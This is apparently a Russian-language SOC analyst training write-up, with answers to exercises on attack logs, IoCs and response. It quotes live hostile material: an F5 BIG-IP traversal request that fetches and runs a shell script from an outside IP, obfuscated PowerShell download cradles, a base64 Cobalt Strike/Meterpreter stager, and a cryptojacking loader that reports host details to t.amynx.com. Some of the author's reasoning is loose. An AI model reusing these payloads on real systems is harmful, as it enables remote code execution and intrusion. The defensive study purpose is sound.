Мониторинг ИБ. Работа специалиста SOC

<h1>Мониторинг ИБ. Работа специалиста SOC</h1> ## Задание 1 1. Опишите, что происходит (чего добиваются атакующие). 2. Выделите признаки, по которым понятно, что происходит атака. 3. Выделите IoС'и, которые могут быть использованы для выявления подобной активности в будущем. 4. Укажите, каким образом можно удостовериться в том, удалось ли атакующим достигнуть того, чего они добивались этим запросом. HTTP-Запрос GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=wget+http%253A%252F%252F136.144.41.3%252Bigipdmcdmsklcmk%252ohsitsvegawellrip.sh+%253B+chmod+777+ohsitsvegawellrip.sh+%253B+sh+ohsitsvegawellrip.sh+%253B+wget+https%253A%252F%252Fhttps:%252%252iplogger.org%2522FGVP5 HTTP/1.1 Host: 10.27.243.60 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.25.1 Для начала заменим "сломавшуюся" кодировку для удобства %253A = ":" %252F = "/" %252B = "+" Итоговый HTTP-Запрос GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=wget+http://136.144.41.3/Bigipdmcdmsklcmk/ohsitsvegawellrip.sh + chmod 777 ohsitsvegawellrip.sh + sh ohsitsvegawellrip.sh + wget https://https://iplogger.org/2FGVP5 HTTP/1.1 Разберем его по частям: 1 часть GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=wget+http://136.144.41.3/Bigipdmcdmsklcmk/ohsitsvegawellrip.sh В данной части атакующий удаленно исполняет команду для скачивания файла, об этом свидетельствует часть строки command=wget расширение файла .sh свидетельствует о том что это shell-скрипт. 2 часть chmod 777 ohsitsvegawellrip.sh Эта команда изменяет права на файл. После выполнения данной команды файл могут просматривать изменять и исполнять все пользователи 3 часть sh ohsitsvegawellrip.sh Данная команда приводит к исполнению ранее скачанного файла 4 часть wget https://https://iplogger.org/2FGVP5 Даная команда скачивает iplogger который позволяет узнать ip жертвы Признаки по которым можно понять, что это - атака: Удаленное исполнение команды Изменение прав на скачанном файле и дальнейшее его исполнение Удаленное скачивание iplogger Индикаторы компрометации которые помогут в будущем определить атаку: Атомарные - ip-адреса, DNS-адреса, полные URL Вычисляемые - MD5, SHA1, ключи реестра, списки процессов Удалось ли атакующим сделать, что они хотели(в рамках данного задания), можно узнать проверив скачались ли файлы по ссылке и если ранее был настроен журнал security можно увидеть изменение прав на файл, также можно увидеть исполнение файла в PowerShell log ## Задание 2 1. Что подозрительного в событии? 2. С какой целью реализовано? ![](https://i.imgur.com/lSCVBAI.png) Commandinvocation(Invoke-Expression): “Invoke- Expression” ParameterBinding(Invoke-Expression): name="Command”; value=" &("{2}{3}{0}{1}{4}" -f '-',("{0} {1}"-f ("{1}{0}"-f're','Exp'),'ss'),'l',("{0}{1}" -f'nvo','ke'),'ion')(.("{2}{1}{0}" -f("{0}{1}"-f'je','ct'),("{0}{1}" -f'ew','-Ob'),'N')("{4}{3}{2}{0}{1}" -f'l','ient') -f '7u' '/y'),'k'),("{1}{0}" -f 'ur' 'iny'),("{0}{1}"-f 'pd','uz')))" Подозрения вызывает в данном событии нетипичный синтаксис команды А реализовано это с целью обойти ограничение на выполнение шелл кода путем сбора команды для обхода невозможности выполнения шелла из-за отсутствия привилегий или настройки ограниченного языкового режима ## Задание 3 В файле task3.evtx содержатся события журнала аудита Windows. 1. Что в этих событиях является подозрительным? 2. Какие признаки указанных событий на это указывают? 3. Какие IoC'и можно выделить из этих событий? 4. Опишите подробно суть подозрительных действий в системе, зафиксированных в этом журнале. Подозрение вызывает выполнение команды в PowerShell которая закодирована в base64 и также это дочерний процесс WINWORD.exe При раскодировании получится команда -Nop -sta -noni -w hidden -encodedCommand I.E.X. .(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.S.t.r.i.n.g.(.'.h.t.t.p.:././.o.m.n.i.-.c.o.n.s.u.m.e.r.-.p.r.0.d.u.c.t.s...t.k./.f.a.v.i.c.o.n...i.c.o.'.).;. Индикатором компрометации является прямая url ссылка Суть действий: Открывается Word ВПО открывает powershell и выполняет команду для скачивания файла Далее выполняется CONHOST.exe, родительским процессом которого является выполненная команда в powershell Этот процесс выполняет удаленное подключение ## Задание 4 В файле event.json приведено корреляционное событие на основе событий журнала аудита Windows. 1. Что произошло на узле? 2. С помощью чего это удалось добиться? 3. Если есть, то укажите адрес C&C и порт. Начнем анализ с команды в powershell часть которой закодирована в base64 ``` "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoACgAJwAnAEgANABzAEkAQQBIAEMAKwBEAEcATQBDAEEANwBWAFgANwBZACsAYQBTAEIAagAvADMAcQBUAC8AQQAyAGwATQB4AEsAdwByAHUARwB1ADMAWABwAE0AbQBOAHkAZwBvAFYAbgBkAGwAVQBWAHkAMQA1AHMATABDACcAJwArACcAJwBDAEYATQBIAHMARABEADQAcwByADMAKwA3AC8AYwBNAFEAcgBWAFgAOQAyADcAdgBrAHMANABYAG4ASgBuAG4AOQBmAHsAMQB9ADgAagBjAHMAMAAnACcAKwAnACcAZABCAGkASgBRAGkARwBOAFAAewAxAH0ASAByADYAMQBkAEMAdgBvAFoAMgBiAEEAewAxAH0AQwBXAE4AcQA5AHEAdwBxAGwASgA2AFYAYgBPAFYANgBWAHQAdgAyACsAbwB3AGcAZgBCAEgARwBPADEAdQB0ADIARgBOAGcAawBYAEwAeAAvADMAMAByAGoARwBJAGYAcwBzAEsAOQAxAE0ARQBOAEoAZwBvAE4ASABTAG4AQQBpAFYAbwBRAC8AaABZAG0AUABZACcAJwArACcAJwAzAHgANQA5AC8AZwBaAE8AMAB6ADQASwBwAFQAKwBxAEgAVgBvADkARwBqAFQAbgBHAHoAZgBzAGgAMABmAEMANQBjAG8AZABQAGwAZABQADMASgBzAGIAbABmAE4AWABGAFAAQwB4AFAASwBuAFQAKwBYAEsALwBMAEsAKwBxAEsAbABmAFUAcABzAG0AWQB0AG4AYwBKAHcAdwBIAE4AWgBmAFMAYwBrAFgANABWAHUARQBLAFIALwBzADEARgBzAHMARAA0AHMAUgBSAEUAaQAxAFoAYgBVAEwAQwA2ADYAdgBhAE8ARQAnACcAKwAnACcAegBzAEoAYgA0AEYAYQBSAHMAOAB3AE0AeQBQADMASwBRAE0AMwBoAHoAOQBpAFQARgBMADQAegBCADMAaQAnACcAKwAnACcAOABzADUAVQBJAGwAbAArAEQAbQBNAEkAdwB7ADEAfQA1AGIAbwB5AFQAcABGAHcAVgA1AGwAegBEAGYATABIADQAWABaAHoAbgA2AHUALwBUAGsASgBFAEEAMQAvAFMAUQA0AFQAaABhAG0AegAnACcAKwAnACcAagB7ADEAfQBFAEEAYwAnACcAKwAnACcAbgB0AGEANABkAHUAaABUAGYANAArAFUAQwB1AEUAdwBXAGsAOQBCAGIAVgBDAHAAQQB0AG8AbABXAFcAQwB5AEYASwBhAFYAVgA0AGIAKwBJAEUAVwAvAHgAdABnAEQAdgBwAFUAegBpAEsAUgBOAFEARABWAGwAYwBxAFUASgBNAHoAegBrADYAaQBOAHkAVQA0AGcATgByACsAWQB5AGwAawBBAGcAVgBXAEgAawB5AEEASAA3AGYATwBJAFQATABJAG4AdQBTAGoAVABNACsAawB6ADcASABnADIATABOAHMAeABzAE0ARgBvAHYAJwAnACsAJwAnAEQASwBDAEUAWgA4AHcAZABCAHIAZwBvAEQAVQBHADIAegBLAE4ANwBEAHQAagBTAEsAVQAxAHgAWgBmAE0AYwBiAFkAdgBOAFIAMwA0AFgAVgBsADQAcQByAEYANwB6AEEAbQBXAHoAaABZAEcANQBGAHgARgAwAGMAMgBYACsASQBmACsAbABSADIAMAA4ACsAYwA2AHIAbgAwADcAbQBOAGwAeQBUAEUANwBYADEAbwBCADgAUQBwAE0AbABZADgARgB4AFMAOABwAEQAagBEAHAARgBhAFEAMwBZAEsAQgBZAGoAbQAvAHcARwA0AGIAVQArAHoAWgBqAEsAUABNAGMAKwBNAG4ATgBqAFUAZwA3AEQAdQB2AGsAaABMAHEANABoAGcANQBFACcAJwArACcAJwBOAGcARQByAEkASwBZAFYAMwA0ADAANQBoAEEANABzAGEAeQBIAEEAeAB3AEEAZgBJAGMAOQBKAEcAdABwAEMAWABXAEMAQwArAHEAOABOAHYAYQBGAGQAcgA0AEgAbwBuAEsATAAyAGsAbABTAEYAWQBZAHAARgBLAHAAVABGAFUAeABzAFUAKwB4AFcAQgBSAFEAbQBKAEwAOQBDAEsAWQB1AHkAbgArAFcAagB1AFkATwBVAE0AdQBMAFkAQwBTAHYARQBMAFMAcAAvAHgAegBQAFgAMgA0AHIAQwBoAE0AVwBwAEEANQBFAEYARABFAGIAbQBHAGoAdgBFAHAAaAB5AFMAcQB0AEEAbABMAGwAYgAyAEoAdgBFAEsALwB7ADEAfQBXAHoAZwBMAFIAcwBTAHEARgArACcAJwArACcAJwBRAE4ASQBHAEEAZwBJAG4ASABBAGkAVAA4AFgAeQBKAHcAZABSAEQAYgBsAFIAcQBKAG0AWgA2AHMASwBZADQAQQBLAEsAcwBkAFcAagBVACcAJwArACcAJwA5AHEAQgBSADUARwBXAFMAWgBaAGoAdABZAGIAZgA4AG4ASwBsAEYATgBSAHgAUwBuADQATgBUAG8ASABKAGkASwBFAFQAYwBwAEIARwByAEMAaABhAEoARwBYAFEAaQBEAG4AUwB5AC8AWAA5AFcALwAnACcAKwAnACcATgB5AEMARAB1AGEAMABZAHAAeABIAFMAQwB3AEsAYgBhADcAcwBHAGEAKwBFAFUAcgBCAEsARQBVAC8AVgBIAEsAWQBNAGwASgBnAEIASQBGAG8AYwBCAFkAcQBkADQASgAnACcAKwAnACcAdgBHAG8AZAAyAEkAYgB5AFMAVgB0AE4AOABPADIAOQBFAFQAZwBxAFYAcQA5ADQAYQBsAG0ARwBhADcAJwAnACsAJwAnAGEANAA2AHQARwBUAFYAMQBaAGsANQBWADAAaAAvADcAdgBrADcAcQB1AGoAYwBhAGQAWABzAG0AdQByAGcAMgBWADIAdQBkAFgAUABjAE0AbwBFAE4AeAB7ADEAfQArAGMAdgBrAFoANwBvAGEAbABmAFoARwAzAFUARgBPAFYAMwB5AHoAdQBwAGwAOQBFAFQAVwBtACcAJwArACcAJwA0AGEAbAA2AGMAaABWAEEAdQAvAEIAbQA3AGEAMgArAHQAQgAvADAARQBGAFIAcQArAC8AcABIAG4AdwBWADMAWABjAFUAewAxAH0AUwBaADcAaQBxAHcAegB2AGEATQBwAEsAcABHAFIAWgB4AHAAZABvADEARwBmADMAUQA0AGMAcQBrAHQATgBxAHAAQQBuAFUAegBkAFIAZAA4AEwAMQBHAFUANgAzADEANwBaADMAbwBFAGQAdABOAEwAbwBQAHUAeABHADYASABmAFMAUQByADkAMgA1ACcAJwArACcAJwBXAHYAMQBLADgAegBuAC8AaQB2AFAAUABWAHAAMQArAFcAOAAnACcAKwAnACcAMwAyAEQAdAA4AGIAMAAwAFEAbABLAHUAaABSAHQAYQBsAGgAKwBYAGgAaQByAFoAVwBKAHEAcwAwAE0AYQA2ADEANwBGADEAdgBQAHMAUABwAFMAUQAvAE0AVgBPAE4AZgBKAHIAcgA4ADIASgBWAGoAMQB7ADEAfQBtADgAVAB1AGsAOABEADIAbgB3AGEAZwBMAG0ARwBOAHsAMQB9AHMAUgBQAE4ATQA5AHYAUAB7ADEAfQBRAGcAWgBBADUARABhAG4ANQB1AEcAMABoAFIAYgB0AHYAcgBSAHQAdABKAEcAdABqAE8ARgB1AE4AOQBIAEIAbgBQAEsANABIADcAbgA3AGEAbABYADYAegBCAGcAUwB2AEkAMgBTAG8AQwBHAGsAVQBTAGoAVgBBADkAcgBZAHQAMQBTAGYAUgBSADgATgA2AGEANAB4AFYAewAxAH0AYgBjAGYAeQA3AHUAdAArAGwAbgBhAHEAcQBTADMAWAB7ADEAfQBYAGYAYwB7ADEAfQBmAG0AeABwAE8AVwBqAGEARgBrAG0AWAByAFkAdABYADAARgA3AE4AMwAzAEcAaQB2AFMAdQA0AEMANwB3AEwAYgBrADYAVgBLAHkATwBIADYAdABWAFMAZwA5AGgAUQAvADAAcABqAGYASQBNAEEAVgAvAEQATwBBAGgAUABGADYAMgBkAHcAOQA4AEIAeAA3AEUAUQB2ADEAQgBrAGkAeABQADgAdABDAFMAVwByAHIAWABOAEwAeQBIAEsATAB5AHkAVgB5AEIANwA0AGkARwB3AEUASAB5AEUAVwBDADkANwBPAG0AQwB2AHAASgBTAHMAeABoAGMAUABVAG4AMABNADkAcwBoAEIAYgB5AGQAegBXADQATgB7ADEAfQBFACsAUgBkAHIAYwA3AEkATgBIADMAQQAxAHAAMwBaAFMATwBGADIASwBKAE4ATwBoAEMAYQByAHoAawAxAHIAMwB4AHcATwB3AEEAKwByAEQAagBKAEQASwB4ADEATgB1AGkAQQBUAGIARQA1AFgAVABRADQAegB4AEwAWgB0AHQAcwBLAE8AcQBUADkAYwB1AFkALwAzAGkAbgBUAGgAVABtADEAUABtAFoAbgBPAHMAdABYAHMAVAA0AGkAMQBrAGEAdwAzAGsATwBUAHoATQBRAG4AWgA5AFIAWABrAE4AegBIADUAUABIAGoAOQBxAHUAUQBNAFQALwBMADgAdQBWAGsAMwBzAE8AUABFAHQAeQBuAGsAUAA4AHkAdwBvAGgAbABwAFUAYQB6AGwAZwAyAGsAWQBFAGMANABoAGkAdgB4ADUAcwA4AEoAeABpAEMAawA4AEMAewAxAH0ARABSAFUATgBRAHYAbwBqAFIAeQArAEYAVABNAEoAaABoAE0ANQBNAE8AYwA1AEcATgA3AHIARwBjAG0AbgBmAHQAVgBFAGIANABUAFYAbwA3AEQAcwBqAGgANgAvADMANABHAFIAawBKAFAANABNAFYAYQA2ACsAUABRAFkAMwA1AFYAMwBsADMATABNAHMAdwA1AHsAMQB9AFMAYwAzAHMAdABwAC8AdQBXAHUAdABhAEwAMABYAE0AMgBGAFYAUABpAGsAQgBtAFUASQAyAHoAVwBTAEQATwBMAEkAVQBSAFAARwBYAGcAdwBXAHYAJwAnACsAJwAnAEkAUQBaAE4AKwBYAG0ANABuAGsATQAnACcAKwAnACcATwBWAEsAKwBnAGcAMABKAFQAUAAzAFEAMQBqAHAAOABTAFIAZgBRAFUAdgBjAHkAdABZAHgANgBjAFEAQQB7ADEAfQBZADEAYwBIAHYATwBYADgASAA4AFEAUQBCADkAawB2ADgAUgBTAGcAJwAnACsAJwAnAHgALwBrAG8ANABmAFgAVwBVAE4AdABIAGsANwBwAGQAJwAnACsAJwAnAG0AVABkADYAYQBmAGYAaQA0AC8ANQBZADEAeAA3AE4ALwB1AEgAMQBSAEoAcwBsAFYARABzADUAUABoAHoAOAB7ADEAfQBuAEkAeQAxAFgAKwBmAC8AeABDAFkATQBDAEUAMABZAE0AQgBRAGYAWABqADcAbgBZAGMAagByADUAQwBTADgAUABEAFoAUQBCAGMAdAA4ADgAYgA4AEUAZAB5AG0ANwB2AEkAVQBIAFoAagBiAGsALwBnAEsASgA4AFUAVAAyAGkAZwB3AEEAQQBBAHsAMAB9AHsAMAB9ACcAJwApAC0AZgAnACcAPQAnACcALAAnACcAZQAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==" ``` Задекодим ![](https://i.imgur.com/FYmqsTk.png) Немного погуглим пейлоады и найдем информацию о cobalt strike получим еще часть команды где есть base64 и ее тоже задекодим а после распакуем gunzip'ом ![](https://i.imgur.com/8jUdVjK.png) ![](https://i.imgur.com/UvePlMZ.png) Тут увидим еще 1 base64 Задекодим его ![](https://i.imgur.com/uf0KGHx.png) Далее нагуглим вот такой декодер https://github.com/lasq88/IR-Tools/blob/master/meterpreter.html Закинем в него хеш после 1 декода и получим айпишник и порт 10.158.3.3:4433 ![](https://i.imgur.com/JSEDlYG.png) ## Задание 6 Некий пользователь решил скачать архив с "супер крутой игрой". Внутри лежал bat-файл, который пользователь спокойно запустил. В файле Log.txt приведена выдержка из событий журнала аудита Windows, связанных с указанными действиями. Опишите, что же на самом деле произошло на компьтере пользователя. Укажите необходимые подробности и признаки, по которым можно выявлять подобную активность, а так же необходимые данные для осуществления мер по реагированию. Посчитаем мд5 лога и закинем мд5 на вирустотал и увидим что он задетектил троян Откроем лог и увидим команду powershell часть которой закодирована в base64 Раскодируем ее ![](https://i.imgur.com/bS2voi0.png) Увидим еще один декодинг base64 и после декодинга увидим ipadress к которому происходило подключение и скачивание батника ![](https://i.imgur.com/abDS0VR.png) Был замечен просмотр реестра и подключение к удаленному хосту с выдачей прав (event 4103) Далее создание файла и его открытие через привилегированную cmd Методы обнаружения: вход стороннего пользователя, изменение реестра, создание новых файлов и папок Медоды реагирования: возвращение настроеек реестра к изначальным дабы предотвратить запуск скрипта повторно, запрет на удаленное подключение, просмотр логов с целью анализа и удаления последних созданных файлов и папок ## Задание 5 В SOC одной компании обратился пользователь, обеспокоенный странными процессами Powershell, которые он обнаружил в диспетчере задач. В ходе расследования специалистам удалось получить информацию об одном из подозрительных PS-скриптов, выполнявшихся на его компьютере (см. файл command.txt) Определите: 1. К какому семейству принадлежит данное ВПО? 2. Перечислите имена всех файлов, которые могли быть загружены на компьютер с помощью данного скрипта. TIP: Поисковиком можно пользоваться ``` powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient).'DownloadData'($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.amy'+'nx.com';a($url+'/a.jsp?ipc_20201126?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*')) ``` 1) Данное ПО относится к семейству cryptojacking После попадания в инфру пытается распространиться и объединить все пк в ботнет с помощью уязвимости в smb cve-2017-0144 $url='http://'+'t.amy'+'nx.com';a($url+'/a.jsp?ipc_20201126?' вот отсюда можно достать IoC url http://t.amynx.com/a.jsp?_20201126 2) Имена файлов cr.bin Dblue3.lnk Dblue6.lnk dn.ps1 Eblue3.lnk Eblue6.lnk Fblue3.lnk Fblue6.lnk Gblue3.lnk Gblue6.lnk Hblue3.lnk Hblue6.lnk Iblue3.lnk Iblue6.lnk if.bin if_mail.bin inf_data Jblue3.lnk Jblue6.lnk Kblue3.lnk Kblue6.lnk logic.jsp logico.jsp m6.bin m6.exe m6g.bin mimi.dat ms.jsp mso.jsp nvd.zip ode.bin rdp.jsp rdpo.jsp readme.js smgh.jsp smgho.jsp svchost.dat tt.vbs wanlins.aspx wanlin.txt